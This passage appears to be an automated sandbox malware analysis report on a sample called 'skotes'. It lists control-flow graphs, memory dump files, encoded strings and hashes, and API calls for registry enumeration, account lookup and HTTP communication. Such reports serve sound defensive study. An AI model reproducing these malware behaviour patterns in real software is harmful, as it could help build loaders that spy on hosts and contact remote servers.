                                                                                                                control_flow_graph 949 7c2517-7c253f call 7c2133 call 7c2191 954 7c26e5-7c271a call 7b6c87 call 7c2133 call 7c2191 949->954 955 7c2545-7c2551 call 7c2139 949->955 977 7c2720-7c272c call 7c2139 954->977 978 7c2842-7c289e call 7b6c87 call 7c62ee 954->978 955->954 960 7c2557-7c2562 955->960 962 7c2598-7c25a1 call 7badf5 960->962 963 7c2564-7c2566 960->963 974 7c25a4-7c25a9 962->974 967 7c2568-7c256c 963->967 970 7c256e-7c2570 967->970 971 7c2588-7c258a 967->971 975 7c2584-7c2586 970->975 976 7c2572-7c2578 970->976 973 7c258d-7c258f 971->973 979 7c2595 973->979 980 7c26e1-7c26e4 973->980 974->974 981 7c25ab-7c25cc call 7bb04b call 7badf5 974->981 975->973 976->971 982 7c257a-7c2582 976->982 977->978 989 7c2732-7c273e call 7c2165 977->989 999 7c28a8-7c28ab 978->999 1000 7c28a0-7c28a6 978->1000 979->962 981->980 997 7c25d2-7c25d5 981->997 982->967 982->975 989->978 998 7c2744-7c2765 call 7badf5 GetTimeZoneInformation 989->998 1001 7c25d8-7c25dd 997->1001 1016 7c276b-7c278c 998->1016 1017 7c2820-7c2841 call 7c212d call 7c2121 call 7c2127 998->1017 1002 7c28ad-7c28bd call 7bb04b 999->1002 1003 7c28ee-7c2900 999->1003 1000->1003 1001->1001 1005 7c25df-7c25f1 call 7ba1f1 1001->1005 1022 7c28bf 1002->1022 1023 7c28c7-7c28e0 call 7c62ee 1002->1023 1009 7c2910 1003->1009 1010 7c2902-7c2905 1003->1010 1005->954 1020 7c25f7-7c260a call 7c4b17 1005->1020 1013 7c2915-7c292a call 7badf5 call 79cff1 1009->1013 1014 7c2910 call 7c26f2 1009->1014 1010->1009 1011 7c2907-7c290e call 7c2517 1010->1011 1011->1013 1014->1013 1024 7c278e-7c2793 1016->1024 1025 7c2796-7c279d 1016->1025 1020->954 1045 7c2610-7c2613 1020->1045 1031 7c28c0-7c28c5 call 7badf5 1022->1031 1041 7c28e5-7c28eb call 7badf5 1023->1041 1042 7c28e2-7c28e3 1023->1042 1024->1025 1032 7c27af-7c27b1 1025->1032 1033 7c279f-7c27a6 1025->1033 1048 7c28ed 1031->1048 1036 7c27b3-7c27dc call 7bef17 call 7be926 1032->1036 1033->1032 1034 7c27a8-7c27ad 1033->1034 1034->1036 1061 7c27de-7c27e1 1036->1061 1062 7c27ea-7c27ec 1036->1062 1041->1048 1042->1031 1052 7c261b-7c2621 1045->1052 1053 7c2615-7c2619 1045->1053 1048->1003 1057 7c2624-7c2631 call 7b8bbe 1052->1057 1058 7c2623 1052->1058 1053->1045 1053->1052 1066 7c2634-7c2639 1057->1066 1058->1057 1061->1062 1064 7c27e3-7c27e8 1061->1064 1065 7c27ee-7c280c call 7be926 1062->1065 1064->1065 1074 7c280e-7c2811 1065->1074 1075 7c281b-7c281e 1065->1075 1068 7c263b-7c2640 1066->1068 1069 7c2642-7c2643 1066->1069 1068->1069 1071 7c2645-7c2648 1068->1071 1069->1066 1072 7c264a-7c2661 call 7b8bbe 1071->1072 1073 7c2696-7c2699 1071->1073 1084 7c2675-7c2677 1072->1084 1085 7c2663 1072->1085 1077 7c269b-7c269d 1073->1077 1078 7c26a0-7c26b4 1073->1078 1074->1075 1079 7c2813-7c2819 1074->1079 1075->1017 1077->1078 1080 7c26ca 1078->1080 1081 7c26b6-7c26c6 call 7c4b17 1078->1081 1079->1017 1086 7c26cd-7c26df call 7c212d call 7c2121 1080->1086 1081->954 1091 7c26c8 1081->1091 1084->1073 1090 7c2679-7c2689 call 7b8bbe 1084->1090 1088 7c2665-7c266a 1085->1088 1086->980 1088->1084 1092 7c266c-7c2673 1088->1092 1098 7c2690-7c2694 1090->1098 1091->1086 1092->1084 1092->1088 1098->1073 1099 7c268b-7c268d 1098->1099 1099->1073 1100 7c268f 1099->1100 1100->1098
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,007D6758), ref: 007C275C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationTimeZone
                                                                                                                • String ID: =L-t$Eastern Standard Time$Eastern Summer Time$Xg}
                                                                                                                • API String ID: 565725191-3469898719
                                                                                                                • Opcode ID: 3b33547e58485bd33f1633732227fc9538180e0ac1f39a3b7961853338819272
                                                                                                                • Instruction ID: 18398a07ebfde3cd2a441d781f1a4733d3d0fd308090d386e36cc536f8e38464
                                                                                                                • Opcode Fuzzy Hash: 3b33547e58485bd33f1633732227fc9538180e0ac1f39a3b7961853338819272
                                                                                                                • Instruction Fuzzy Hash: F3C12671A00245EFDB10AF689C85FAA7BB9EF55350F24409DE580AB253EB3D8E03C760

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1101 7865e0-786639 1175 78663a call 5430bc3 1101->1175 1176 78663a call 5430d02 1101->1176 1177 78663a call 5430a41 1101->1177 1178 78663a call 5430d47 1101->1178 1179 78663a call 5430c46 1101->1179 1180 78663a call 5430b05 1101->1180 1181 78663a call 5430b44 1101->1181 1182 78663a call 5430b13 1101->1182 1183 78663a call 5430ad7 1101->1183 1184 78663a call 5430cd5 1101->1184 1185 78663a call 5430c54 1101->1185 1186 78663a call 5430a9b 1101->1186 1187 78663a call 5430bdf 1101->1187 1188 78663a call 5430a5e 1101->1188 1189 78663a call 5430a22 1101->1189 1190 78663a call 5430ca1 1101->1190 1191 78663a call 5430aab 1101->1191 1192 78663a call 5430c68 1101->1192 1193 78663a call 5430b6f 1101->1193 1194 78663a call 5430c2e 1101->1194 1195 78663a call 5430cad 1101->1195 1196 78663a call 5430bad 1101->1196 1197 78663a call 5430a76 1101->1197 1198 78663a call 5430cf4 1101->1198 1199 78663a call 5430b3b 1101->1199 1200 78663a call 5430bfb 1101->1200 1201 78663a call 5430c7f 1101->1201 1102 78663f-7866b8 LookupAccountNameA call 797a00 call 785c10 1108 7866ba 1102->1108 1109 7866bc-7866db call 7822c0 1102->1109 1108->1109 1112 78670c-786712 1109->1112 1113 7866dd-7866ec 1109->1113 1114 786715-78671a 1112->1114 1115 7866ee-7866fc 1113->1115 1116 786702-786709 call 79d663 1113->1116 1114->1114 1117 78671c-786744 call 797a00 call 785c10 1114->1117 1115->1116 1118 786937 call 7b6c6a 1115->1118 1116->1112 1129 786748-786769 call 7822c0 1117->1129 1130 786746 1117->1130 1124 78693c call 7b6c6a 1118->1124 1128 786941-786946 call 7b6c6a 1124->1128 1135 78679a-7867ae 1129->1135 1136 78676b-78677a 1129->1136 1130->1129 1142 786858-78687c 1135->1142 1143 7867b4-7867ba 1135->1143 1137 78677c-78678a 1136->1137 1138 786790-786797 call 79d663 1136->1138 1137->1124 1137->1138 1138->1135 1145 786880-786885 1142->1145 1144 7867c0-7867ed call 797a00 call 785c10 1143->1144 1159 7867ef 1144->1159 1160 7867f1-786818 call 7822c0 1144->1160 1145->1145 1146 786887-7868ec call 7980c0 * 2 1145->1146 1156 786919-786936 call 79cff1 1146->1156 1157 7868ee-7868fd 1146->1157 1161 78690f-786916 call 79d663 1157->1161 1162 7868ff-78690d 1157->1162 1159->1160 1168 786849-78684c 1160->1168 1169 78681a-786829 1160->1169 1161->1156 1162->1128 1162->1161 1168->1144 1172 786852 1168->1172 1170 78682b-786839 1169->1170 1171 78683f-786846 call 79d663 1169->1171 1170->1118 1170->1171 1171->1168 1172->1142 1175->1102 1176->1102 1177->1102 1178->1102 1179->1102 1180->1102 1181->1102 1182->1102 1183->1102 1184->1102 1185->1102 1186->1102 1187->1102 1188->1102 1189->1102 1190->1102 1191->1102 1192->1102 1193->1102 1194->1102 1195->1102 1196->1102 1197->1102 1198->1102 1199->1102 1200->1102 1201->1102
                                                                                                                APIs
                                                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00786680
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AccountLookupName
                                                                                                                • String ID: =L-t$GSTmfV==$ISNmfV==$RySfdMLx
                                                                                                                • API String ID: 1484870144-3799260598
                                                                                                                • Opcode ID: f1fe8f5ddc9c48d03621b9f5c6a6ff81c87a25f592f83c49f23340a82e1eecc8
                                                                                                                • Instruction ID: fc64e1ebb4fe3c90ca39367766031ab6b92b1986774ab987f0b7cf6ce3f23202
                                                                                                                • Opcode Fuzzy Hash: f1fe8f5ddc9c48d03621b9f5c6a6ff81c87a25f592f83c49f23340a82e1eecc8
                                                                                                                • Instruction Fuzzy Hash: 3991C3B19401189BDB28EB68CC89BDDB779EB45304F4045EDE50997282EB389BC4CFA4

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000005DC,742D4C3D,?,00000000), ref: 0078BEB8
                                                                                                                • InternetOpenW.WININET(007D8DC8,00000000,00000000,00000000,00000000), ref: 0078BEC8
                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0078BEEB
                                                                                                                • HttpOpenRequestA.WININET(?,00000000), ref: 0078BF35
                                                                                                                • HttpSendRequestA.WININET(?,00000000), ref: 0078BFF5
                                                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 0078C0A7
                                                                                                                • InternetCloseHandle.WININET(?), ref: 0078C187
                                                                                                                • InternetCloseHandle.WININET(?), ref: 0078C18F
                                                                                                                • InternetCloseHandle.WININET(?), ref: 0078C197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$=L-t$=L-t$=L-t$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                • API String ID: 2167506142-526263388
                                                                                                                • Opcode ID: 7acdb3d81a583ccb63821634468d4beefa335ec1cfa61241816e58650fc5777a
                                                                                                                • Instruction ID: c71a4533c6f8c0b5412a4fd46ab2784f98dfaf67f120a3c6bcd777175df57c6a
                                                                                                                • Opcode Fuzzy Hash: 7acdb3d81a583ccb63821634468d4beefa335ec1cfa61241816e58650fc5777a
                                                                                                                • Instruction Fuzzy Hash: 96B104B0A00118DBDB29DF28CC89B9DBB79EF45304F508199F508972D2DB399AC0CFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 725 786020-78619d call 79e150 call 7980c0 * 5 RegOpenKeyExA 738 7864b1-7864ba 725->738 739 7861a3-786233 call 7b40f0 725->739 741 7864bc-7864c7 738->741 742 7864e7-7864f0 738->742 765 786239-78623d 739->765 766 78649f-7864ab 739->766 746 7864c9-7864d7 741->746 747 7864dd-7864e4 call 79d663 741->747 743 78651d-786526 742->743 744 7864f2-7864fd 742->744 750 786528-786533 743->750 751 786553-78655c 743->751 748 7864ff-78650d 744->748 749 786513-78651a call 79d663 744->749 746->747 752 7865d7-7865df call 7b6c6a 746->752 747->742 748->749 748->752 749->743 757 786549-786550 call 79d663 750->757 758 786535-786543 750->758 760 78655e-786569 751->760 761 786585-78658e 751->761 757->751 758->752 758->757 769 78657b-786582 call 79d663 760->769 770 78656b-786579 760->770 762 7865bb-7865d6 call 79cff1 761->762 763 786590-78659f 761->763 772 7865b1-7865b8 call 79d663 763->772 773 7865a1-7865af 763->773 775 786499 765->775 776 786243-786279 RegEnumValueA 765->776 766->738 769->761 770->752 770->769 772->762 773->752 773->772 775->766 782 78627f-78629e 776->782 783 786486-78648d 776->783 786 7862a0-7862a5 782->786 783->776 784 786493 783->784 784->775 786->786 787 7862a7-7862fb call 7980c0 call 797a00 * 2 call 785d50 786->787 787->783
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0078617D
                                                                                                                • RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00786271
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
